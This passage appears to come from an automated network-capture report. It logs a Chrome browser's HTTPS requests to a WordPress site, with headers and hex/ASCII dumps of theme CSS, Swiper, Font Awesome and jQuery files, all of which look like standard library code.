                                                                                                          2024-12-12 11:58:12 UTC13500INData Raw: 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 23 20 44 65 66 69 6e 65 64 20 56 61 72 69 61 62 6c 65 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0a 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 23 20 47 6c 6f 62 61 6c 20 53 74 79 6c 65 20 2d 20 46 4d 20 54 68 65 6d 65 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                          Data Ascii: /*--------------------------------------------------------------# Defined Variable--------------------------------------------------------------*//*--------------------------------------------------------------# Global Style - FM Theme---------------


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          37192.168.2.2449811147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:12 UTC595OUTGET /wp-content/themes/ciena/assets/css/body_color.css?ver=1.0.8 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:13 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:13 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 04 Sep 2024 07:54:07 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 11295
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:13 UTC11295INData Raw: 62 6f 64 79 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 7d 0a 0a 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 6c 61 62 65 6c 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 6c 61 62 65 6c 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 7d 0a 0a 23 66 6d 2d 61 63 63 6f 75 6e 74 2d 6d 6f 64 61 6c 20 66 6f 72 6d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 65 67 69 73 74 65 72 20 2e 66 6f 72 6d 2d 72 6f 77 20 6c 61 62 65 6c 2c 20 23 66 6d 2d 61 63 63 6f 75 6e 74 2d 6d 6f 64 61 6c 20 66 6f 72 6d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2e 77 6f 6f 63 6f 6d 6d
                                                                                                          Data Ascii: body { color: #6d6d6d;}.woocommerce form .form-row label, .woocommerce-page form .form-row label { color: #6d6d6d;}#fm-account-modal form.woocommerce-form.woocommerce-form-register .form-row label, #fm-account-modal form.woocommerce-form.woocomm


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          38192.168.2.2449812147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:13 UTC602OUTGET /wp-content/themes/ciena/assets/vendors/swiper/swiper.css?ver=5.3.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:13 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:13 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:51 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 15731
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:13 UTC15731INData Raw: 2f 2a 2a 0a 20 2a 20 53 77 69 70 65 72 20 35 2e 33 2e 31 0a 20 2a 20 4d 6f 73 74 20 6d 6f 64 65 72 6e 20 6d 6f 62 69 6c 65 20 74 6f 75 63 68 20 73 6c 69 64 65 72 20 61 6e 64 20 66 72 61 6d 65 77 6f 72 6b 20 77 69 74 68 20 68 61 72 64 77 61 72 65 20 61 63 63 65 6c 65 72 61 74 65 64 20 74 72 61 6e 73 69 74 69 6f 6e 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 73 77 69 70 65 72 6a 73 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2d 32 30 32 30 20 56 6c 61 64 69 6d 69 72 20 4b 68 61 72 6c 61 6d 70 69 64 69 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 6f 6e 3a 20 46 65 62 72 75 61 72 79 20 38 2c 20 32 30 32 30 0a 20 2a 2f 0a 0a
                                                                                                          Data Ascii: /** * Swiper 5.3.1 * Most modern mobile touch slider and framework with hardware accelerated transitions * http://swiperjs.com * * Copyright 2014-2020 Vladimir Kharlampidi * * Released under the MIT License * * Released on: February 8, 2020 */


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          39192.168.2.2449813147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:13 UTC623OUTGET /wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:14 UTC268INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:13 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 25 Mar 2022 21:30:22 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 57912
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:14 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 35 2e 31 35 2e 33 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 0a 2e 66 61 2c 2e 66 61 62 2c 2e 66 61 64 2c 2e 66 61 6c 2c 2e 66 61 72 2c 2e 66 61 73 7b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69
                                                                                                          Data Ascii: /*! * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) */.fa,.fab,.fad,.fal,.far,.fas{-moz-osx-font-smoothing:grayscale;-webki
                                                                                                          2024-12-12 11:58:14 UTC16384INData Raw: 6f 79 64 6f 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 38 65 22 7d 2e 66 61 2d 64 65 73 6b 70 72 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 38 66 22 7d 2e 66 61 2d 64 65 73 6b 74 6f 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 30 38 22 7d 2e 66 61 2d 64 65 76 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 63 63 22 7d 2e 66 61 2d 64 65 76 69 61 6e 74 61 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 62 64 22 7d 2e 66 61 2d 64 68 61 72 6d 61 63 68 61 6b 72 61 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 35 35 22 7d 2e 66 61 2d 64 68 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 39 30 22 7d 2e 66 61 2d 64 69 61 67 6e 6f 73 65 73 3a 62 65
                                                                                                          Data Ascii: oydog:before{content:"\f38e"}.fa-deskpro:before{content:"\f38f"}.fa-desktop:before{content:"\f108"}.fa-dev:before{content:"\f6cc"}.fa-deviantart:before{content:"\f1bd"}.fa-dharmachakra:before{content:"\f655"}.fa-dhl:before{content:"\f790"}.fa-diagnoses:be
                                                                                                          2024-12-12 11:58:14 UTC16384INData Raw: 77 2d 61 6c 74 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 30 63 22 7d 2e 66 61 2d 6c 6f 77 2d 76 69 73 69 6f 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 61 38 22 7d 2e 66 61 2d 6c 75 67 67 61 67 65 2d 63 61 72 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 39 64 22 7d 2e 66 61 2d 6c 75 6e 67 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 36 30 34 22 7d 2e 66 61 2d 6c 75 6e 67 73 2d 76 69 72 75 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 36 37 22 7d 2e 66 61 2d 6c 79 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 63 33 22 7d 2e 66 61 2d 6d 61 67 65 6e 74 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 63 34 22 7d 2e 66 61 2d 6d 61
                                                                                                          Data Ascii: w-alt-up:before{content:"\f30c"}.fa-low-vision:before{content:"\f2a8"}.fa-luggage-cart:before{content:"\f59d"}.fa-lungs:before{content:"\f604"}.fa-lungs-virus:before{content:"\e067"}.fa-lyft:before{content:"\f3c3"}.fa-magento:before{content:"\f3c4"}.fa-ma
                                                                                                          2024-12-12 11:58:14 UTC8760INData Raw: 66 34 38 65 22 7d 2e 66 61 2d 74 61 62 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 65 22 7d 2e 66 61 2d 74 61 62 6c 65 2d 74 65 6e 6e 69 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 35 64 22 7d 2e 66 61 2d 74 61 62 6c 65 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 30 61 22 7d 2e 66 61 2d 74 61 62 6c 65 74 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 66 61 22 7d 2e 66 61 2d 74 61 62 6c 65 74 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 39 30 22 7d 2e 66 61 2d 74 61 63 68 6f 6d 65 74 65 72 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 66 64 22 7d 2e 66 61 2d 74 61 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30
                                                                                                          Data Ascii: f48e"}.fa-table:before{content:"\f0ce"}.fa-table-tennis:before{content:"\f45d"}.fa-tablet:before{content:"\f10a"}.fa-tablet-alt:before{content:"\f3fa"}.fa-tablets:before{content:"\f490"}.fa-tachometer-alt:before{content:"\f3fd"}.fa-tag:before{content:"\f0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          40192.168.2.2449814147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:14 UTC618OUTGET /wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: style
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:14 UTC266INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:14 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 25 Mar 2022 21:30:22 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 675
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: public
                                                                                                          Connection: close
                                                                                                          Content-Type: text/css
                                                                                                          2024-12-12 11:58:14 UTC675INData Raw: 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 35 2e 31 35 2e 33 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 42 72 61 6e 64 73 22 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74
                                                                                                          Data Ascii: /*! * Font Awesome Free 5.15.3 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) */@font-face{font-family:"Font Awesome 5 Brands";font-style:normal;font


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          41192.168.2.2449815147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:14 UTC567OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-12 11:58:14 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:14 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 05 Jul 2024 00:59:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 87553
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:15 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                          Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                          2024-12-12 11:58:15 UTC16384INData Raw: 5d 7d 29 2c 6c 61 73 74 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 5b 74 2d 31 5d 7d 29 2c 65 71 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 5b 6e 3c 30 3f 6e 2b 74 3a 6e 5d 7d 29 2c 65 76 65 6e 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6f 64 64 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 74 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6c 74 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 3d 6e 3c 30 3f 6e 2b 74 3a 74 3c 6e 3f 74 3a 6e 3b 30
                                                                                                          Data Ascii: ]}),last:X(function(e,t){return[t-1]}),eq:X(function(e,t,n){return[n<0?n+t:n]}),even:X(function(e,t){for(var n=0;n<t;n+=2)e.push(n);return e}),odd:X(function(e,t){for(var n=1;n<t;n+=2)e.push(n);return e}),lt:X(function(e,t,n){var r;for(r=n<0?n+t:t<n?t:n;0
                                                                                                          2024-12-12 11:58:15 UTC16384INData Raw: 74 68 69 73 2c 74 2c 6e 29 3b 63 65 2e 5f 71 75 65 75 65 48 6f 6f 6b 73 28 74 68 69 73 2c 74 29 2c 22 66 78 22 3d 3d 3d 74 26 26 22 69 6e 70 72 6f 67 72 65 73 73 22 21 3d 3d 65 5b 30 5d 26 26 63 65 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 74 29 7d 29 7d 2c 64 65 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 65 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 65 29 7d 29 7d 2c 63 6c 65 61 72 51 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 71 75 65 75 65 28 65 7c 7c 22 66 78 22 2c 5b 5d 29 7d 2c 70 72 6f 6d 69 73 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 31 2c 69 3d 63 65 2e 44 65 66 65 72 72 65 64
                                                                                                          Data Ascii: this,t,n);ce._queueHooks(this,t),"fx"===t&&"inprogress"!==e[0]&&ce.dequeue(this,t)})},dequeue:function(e){return this.each(function(){ce.dequeue(this,e)})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,t){var n,r=1,i=ce.Deferred
                                                                                                          2024-12-12 11:58:15 UTC16384INData Raw: 29 7b 63 65 2e 66 6e 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 5b 5d 2c 72 3d 63 65 28 65 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 2d 31 2c 6f 3d 30 3b 6f 3c 3d 69 3b 6f 2b 2b 29 74 3d 6f 3d 3d 3d 69 3f 74 68 69 73 3a 74 68 69 73 2e 63 6c 6f 6e 65 28 21 30 29 2c 63 65 28 72 5b 6f 5d 29 5b 61 5d 28 74 29 2c 73 2e 61 70 70 6c 79 28 6e 2c 74 2e 67 65 74 28 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6e 29 7d 7d 29 3b 76 61 72 20 5f 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 47 2b 22 29 28 3f 21 70 78 29 5b 61 2d 7a 25 5d 2b 24 22 2c 22 69 22 29 2c 7a 65 3d 2f 5e 2d 2d 2f 2c 58 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74
                                                                                                          Data Ascii: ){ce.fn[e]=function(e){for(var t,n=[],r=ce(e),i=r.length-1,o=0;o<=i;o++)t=o===i?this:this.clone(!0),ce(r[o])[a](t),s.apply(n,t.get());return this.pushStack(n)}});var _e=new RegExp("^("+G+")(?!px)[a-z%]+$","i"),ze=/^--/,Xe=function(e){var t=e.ownerDocument
                                                                                                          2024-12-12 11:58:15 UTC16384INData Raw: 6f 70 46 69 78 3a 7b 22 66 6f 72 22 3a 22 68 74 6d 6c 46 6f 72 22 2c 22 63 6c 61 73 73 22 3a 22 63 6c 61 73 73 4e 61 6d 65 22 7d 7d 29 2c 6c 65 2e 6f 70 74 53 65 6c 65 63 74 65 64 7c 7c 28 63 65 2e 70 72 6f 70 48 6f 6f 6b 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 74 26 26 28 74 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74
                                                                                                          Data Ascii: opFix:{"for":"htmlFor","class":"className"}}),le.optSelected||(ce.propHooks.selected={get:function(e){var t=e.parentNode;return t&&t.parentNode&&t.parentNode.selectedIndex,null},set:function(e){var t=e.parentNode;t&&(t.selectedIndex,t.parentNode&&t.parent
                                                                                                          2024-12-12 11:58:15 UTC5633INData Raw: 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 72 3d 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 76 28 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 28 29 3a 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 2c 61 3f 65 5b 61 5d 3d 65 5b 61 5d 2e 72 65 70 6c 61 63 65 28 5a 74 2c 22 24 31 22 2b 72 29 3a 21 31 21 3d 3d 65 2e 6a 73 6f 6e 70 26 26 28 65 2e 75 72 6c 2b 3d 28 41 74 2e 74 65 73 74 28 65 2e 75 72 6c 29 3f 22 26 22 3a 22 3f 22 29 2b 65 2e 6a 73 6f 6e 70 2b 22 3d 22 2b 72 29 2c 65 2e 63 6f 6e 76 65 72 74 65 72 73 5b 22 73 63 72 69 70 74 20 6a 73 6f 6e 22 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7c 7c 63 65 2e 65 72 72 6f 72 28 72 2b 22 20 77 61 73 20 6e 6f 74 20 63
